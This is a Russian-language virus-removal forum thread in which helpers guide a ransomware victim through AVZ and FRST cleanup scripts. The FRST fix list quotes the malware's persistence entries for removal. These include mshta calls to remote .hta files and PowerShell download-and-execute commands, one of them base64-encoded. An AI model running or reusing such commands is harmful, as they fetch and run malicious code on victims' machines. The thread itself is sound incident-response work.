Вирус зашифровал компьютер. Помогите.

Добрый день. Вирус зашифровал компьютер, очень много рабочей информации.

Уважаемый(ая) [B]Jekos_f75[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Здравствуйте!

Несколько (2-3) зашифрованных документов вместе с запиской с требованием выкупа заархивируйте и прикрепите к следующему сообщению.

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
TerminateProcessByName('C:\Windows\services.exe');
TerminateProcessByName('C:\Windows\System32\service.exe');
QuarantineFile('C:\ProgramData\Aebblnroq.psd', '');
QuarantineFile('C:\ProgramData\WindowsUpdate\1.vbs', '');
QuarantineFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (10) - копия.txt', '');
QuarantineFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (11) - копия.txt', '');
QuarantineFile('C:\Windows\services.exe', '');
QuarantineFile('C:\Windows\System32\service.exe', '');
QuarantineFile('C:\Windows\TEMP\11134945.dll', '');
DeleteFile('C:\ProgramData\Aebblnroq.psd', '64');
DeleteFile('C:\ProgramData\WindowsUpdate\1.vbs', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (10) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (11) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (12) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (13) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (14) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (15) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (16) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (17) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (18) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (19) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (20) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (21) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (22) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (23) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (24) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (25) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (26) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (27) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (28) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (29) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (30) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (31) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (32) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (33) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (34) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (35) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (36) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (37) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (38) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (39) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (4) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (4).txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (40) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (41) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (42) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (43) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (44) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (45) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (46) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (47) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (48) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (49) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (5) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (50) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (51) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (52) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (53) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (54) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (55) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (56) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (57) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (58) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (59) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (6) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (60) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (61) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (62) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (7) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (8) - копия.txt', '64');
DeleteFile('C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (9) - копия.txt', '64');
DeleteFile('C:\Windows\services.exe', '');
DeleteFile('c:\windows\system32\service.exe', '32');
DeleteFile('C:\Windows\TEMP\11134945.dll', '64');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Tomcat9\Parameters', 'ServiceDll', '64');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\w3wp\Parameters', 'ServiceDll', '64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DriverPack Notifier', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\windows', 'x64');
DeleteSchedulerTask('Microsoft\Windows Defender\ScannerSchduler');
DeleteSchedulerTask('Microsoft\Windows\Diagnosis\ScheduledDiagnosis');
DeleteSchedulerTask('Microsoft\Windows\Multimedia\CodecUpdateTask');
DeleteSchedulerTask('Microsoft\Windows\Ras\WinSockets');
DeleteSchedulerTask('Microsoft\Windows\Shell\WindowsParentalControlsSettings');
DeleteSchedulerTask('Microsoft\Windows\Tcpip\IpAddressConflict');
DeleteSchedulerTask('Microsoft\Windows\WDI\UPD');
DeleteSchedulerTask('Microsoft\Windows\Windows Defender\Task Update');
DeleteSchedulerTask('Microsoft\Windows\Windows Filtering Platform\IP Filter');
DeleteSchedulerTask('UpdateOne');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, упакуйте его в архив с паролем вместе с двумя зашифрованными файлами, выложите на файлообменник или в облако и дайте ссылку с паролем [U][B]в личном сообщении[/B][/U].

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O7 - IPSec: Name: 445celue (2017/06/15) - {7d1b2588-9308-4921-8500-84e11856cb1c} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: 445celue (2017/06/15) - {7d1b2588-9308-4921-8500-84e11856cb1c} - Source: Any IP - Destination: my IP (Port 136 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: 445celue (2017/06/15) - {7d1b2588-9308-4921-8500-84e11856cb1c} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: 445celue (2017/06/15) - {7d1b2588-9308-4921-8500-84e11856cb1c} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: 445celue (2017/06/15) - {7d1b2588-9308-4921-8500-84e11856cb1c} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: 445celue (2017/06/15) - {7d1b2588-9308-4921-8500-84e11856cb1c} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block[/code]
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] или с [URL="https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.

Нажмите кнопку [B]Сканировать[/B].

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Высылаю архив с файлами.
Еще во всех папках присутствент один и тот же файл (.ехе)

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Высылаю файлы FRST

Пользователь hidden знаком, сами создавали?

Как шифрование прошло, по RDP?

Такого пользователя не создавали, систему устанавливали очень давно и не я. Утром включили компьютер, на экране куча открытых блокнотов с текстом выкупа, рабочий стол и папки забиты зашифрованными файлами. Программы не запускаются, баз 1С нет.

[QUOTE=Jekos_f75;1527962]Еще во всех папках присутствент один и тот же файл (.ехе)[/QUOTE]

Проверьте файл maincrt23.exe на Virustotal.com и дайте ссылку на результат.

Кстати, все файлы с рабочего стола, похоже, сперва упакованы в многотомный архив Rar, (наверняка с паролем) а потом уже зашифрованы.

[url]https://www.virustotal.com/gui/file/7eb63945d7e61258ec488f3855349c1dbff4eb04c5d7721264c346e5721db260/detection[/url]

Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
Systemrestore: on
CreateRestorePoint:
HKU\S-1-5-21-3152054174-1278652476-1400434922-1000\...\Run: [DontSleep] => "C:\Users\Главный бухгалтер\Downloads\DontSleep_x64\DontSleep_x64.exe" -bg (Нет файла)
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (10) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (11) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (12) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (13) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (14) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (15) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (16) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (17) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (18) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (19) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (20) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (21) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (22) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (23) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (24) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (25) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (26) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (27) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (28) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (29) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (30) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (31) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (32) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (33) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (34) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (35) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (36) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (37) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (38) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (39) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (4) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (4).txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (40) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (41) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (42) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (43) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (44) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (45) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (46) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (47) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (48) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (49) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (5) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (50) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (51) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (52) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (53) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (54) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (55) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (56) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (57) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (58) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (59) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (6) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (60) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (61) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (62) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (7) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (8) - копия.txt [2023-05-08] () [Файл не подписан]
Startup: C:\Users\Главный бухгалтер\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReadME (9) - копия.txt [2023-05-08] () [Файл не подписан]
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
Task: {7D827B2F-EEB7-41A1-AAA5-C4C0E301C7C8} - System32\Tasks\Microsoft\Windows\WindowsUpdate\AUIFirmwareUpdate => C:\Windows\system32\cmd.exe [345088 2010-11-21] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
Task: {8923AE97-D576-4D5E-887D-4515BC101E16} - System32\Tasks\Microsoft\Windows\SetUpd => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {EB5B90F9-A763-40AB-A0D0-0ED70A804EF4} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostSearch => C:\Windows\system32\cmd.exe [345088 2010-11-21] (Microsoft Windows -> Microsoft Corporation)
Task: {ED0A90A1-66DF-4387-8E99-97A3C17D204C} - System32\Tasks\Microsoft\Windows\Location\Telemetry => C:\Windows\system32\cmd.exe [345088 2010-11-21] (Microsoft Windows -> Microsoft Corporation)
Task: {F56290BB-F5DF-425E-B494-11DF48F68C09} - System32\Tasks\Microsoft\Windows\Multimedia\SystemVideoService => C:\Windows\system32\cmd.exe [345088 2010-11-21] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
CHR HKLM-x32\...\Chrome\Extension: [lgdnilodcpljomelbbnpgdogdbmclbni]
S2 Tomcat9; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S2 Tomcat9; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S2 w3wp; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S2 w3wp; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S3 cli_optimization_v2.0.55728_32; cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta [X]
S2 cli_optimization_v2.0.55728_64; cmd /c mshta hxxp://eu1.minerpool.pw/check.hta [X]
S3 cli_optimization_v2.0.56730_32; cmd /c powershell -exec bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://v1.fym5gserobhh.pw/v1/check1.ps1')) [X]
S3 cli_optimization_v2.0.56733_32; cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYQAuADYAdQA5ADkAcQB2ADAAYgAuAHMAdQAvAHYAMQAvAGMAaABlAGMAawAxAC4AcABzADEAIgApACkA [X]
S3 AtiDCM; \??\C:\Users\Главный бухгалтер\AppData\Local\Temp\atidcmxx.sys [X] <==== ВНИМАНИЕ
S1 mydtxbee; \??\C:\Windows\system32\drivers\mydtxbee.sys [X]
2023-05-11 14:42 - 2023-05-11 14:42 - 664732241 _____ C:\Windows\MEMORY.DMP
CMD: net user John /delete
Folder: C:\ProgramData\WindowsUpdate
2023-05-08 13:04 - 2023-05-08 13:04 - 000002607 _____ C:\Users\Главный бухгалтер\Documents\_ReadME.txt
2023-05-08 13:00 - 2023-05-08 12:21 - 008639144 _____ C:\Users\Главный бухгалтер\Documents\maincrt23.exe
C:\Users\hidden
